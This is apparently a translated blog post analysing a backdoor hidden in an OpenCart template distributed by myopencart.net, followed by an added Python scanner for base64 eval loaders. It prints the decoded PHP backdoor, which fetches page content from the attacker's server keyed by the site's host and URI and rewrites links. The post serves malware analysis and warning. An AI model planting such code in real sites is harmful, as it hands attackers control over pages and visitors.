
The story of one template, or a backdoor from myopencart.net

Foreword


A friend once asked me to look into why he could not install a template on the OpenCart CMS.

He sent me a link to the site, along with access to the admin area and the hosting. I log in and see the template in the theme directory (/catalog/view/theme/). Knowing a little about how the system is structured, I know that there is no tool for uploading templates, as there is in WordPress, for example. Adding a new theme means uploading the necessary files into specific folders; the CMS "learns" about the available templates by scanning the themes folder.

So the solution to the problem was trivial: the template had simply been uploaded incorrectly. In this case it had to be uploaded to the root of the site.

Denouement


This would have ended the story, but the archive also contained "extra" files, and replacements for existing ones, that had nothing to do with the template. I wondered what was missing and what needed to be replaced.
Some scripts were added to the controllers and localization files, and /system/library/response.php was replaced.

The most interesting was the last file, where I found this line:

```php
$ouput = eval(base64_decode('='));
```


Of course, there was nothing like this in the original file.

After decoding, it naturally turned out to be a backdoor (reformatted for readability; the code itself is unchanged, including the malware's own `$ouput` typo and the `case '404';` semicolon):

```php
function get_page($url) {
    $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_VERBOSE, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $page = curl_exec($ch);
    $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    switch ($httpcode) {
        case '200': return $page; break;
        case '404'; return false; break;
    }
}

// Ask the attacker's server for content, keyed by the victim's host name and the requested URI.
if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=" . $_SERVER['SERVER_NAME'] . "&page=" . $_SERVER['REQUEST_URI'])) {
    // Drop </body>, put the remote response in place of </html>,
    // and rewrite links to the official site and to competitors.
    $find = array("</body>", "</html>", "opencart.com", "maxzon.ru", "myopencart.ru", "opencartforum.ru", "opencart.ru", "opencart.by");
    $replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
    $ouput = str_replace($find, $replace, $ouput);
    ini_set("display_errors", "off");
    error_reporting(0);
    echo $ouput;
} else {
    echo $ouput;
}
```


This code not only rewrites links to competitors and to the official site, but also lets the remote server control the content of the page.

At the moment the server above returns this response:

```html
</body></html>
```

But what stops them from returning PHP code instead?

So it goes.
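As an added example (not code from the original post), here is a small scanner for finding this kind of loader in an OpenCart install: it walks the tree for PHP files containing eval(base64_decode(...)), decodes the payload where it can, and reports which traits of the backdoor above (a curl fetch keyed by SERVER_NAME and REQUEST_URI, rewriting of </html>) the payload contains. The directory layout and payload built in demo() are constructed for the demonstration.

```python
import base64
import os
import re
import tempfile

# The loader line found in response.php: eval(base64_decode('<payload>'))
LOADER_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")

# Traits of the decoded payload above: a remote fetch keyed by the victim's
# host name and request URI, and rewriting of the page's closing tag.
PAYLOAD_INDICATORS = ("curl_init", "$_SERVER['SERVER_NAME']",
                      "$_SERVER['REQUEST_URI']", "</html>")

def scan_text(text, path="<string>"):
    """Report every base64 eval-loader in PHP source and the traits its payload shows."""
    findings = []
    for match in LOADER_RE.finditer(text):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            decoded = ""  # truncated or bogus base64: still report the loader itself
        hits = [s for s in PAYLOAD_INDICATORS if s in decoded]
        findings.append({"file": path, "indicators": hits})
    return findings

def scan_tree(root):
    """Walk an OpenCart install and scan every .php file."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), path))
    return findings

def demo():
    """Constructed sample tree: one clean library file and one planted loader."""
    payload = ("$ch = curl_init(); $u = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; "
               "echo str_replace('</html>', $ftend, $ouput);")
    loader = "<?php\n$ouput = eval(base64_decode('%s'));\n" % base64.b64encode(payload.encode()).decode()
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "system", "library")
        os.makedirs(lib)
        with open(os.path.join(lib, "response.php"), "w") as fh:
            fh.write(loader)
        with open(os.path.join(lib, "cache.php"), "w") as fh:
            fh.write("<?php\nclass Cache { }\n")
        return scan_tree(root)
```

Running the same scan over a real install and diffing the flagged files against a clean OpenCart release of the same version is the quickest way to confirm a replaced library file.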

Conclusion


To check and confirm my concerns, I went to the "Partners" section of the official website opencart.com, where the official Russian site opencart.ru is listed. This in fact confirmed that myopencart.net is a phishing site.

Be careful and check what you install!

UPD
Regarding the PHP code: it turned out that executing it on the attacked server would fail.

Source: https://habr.com/ru/post/193910/
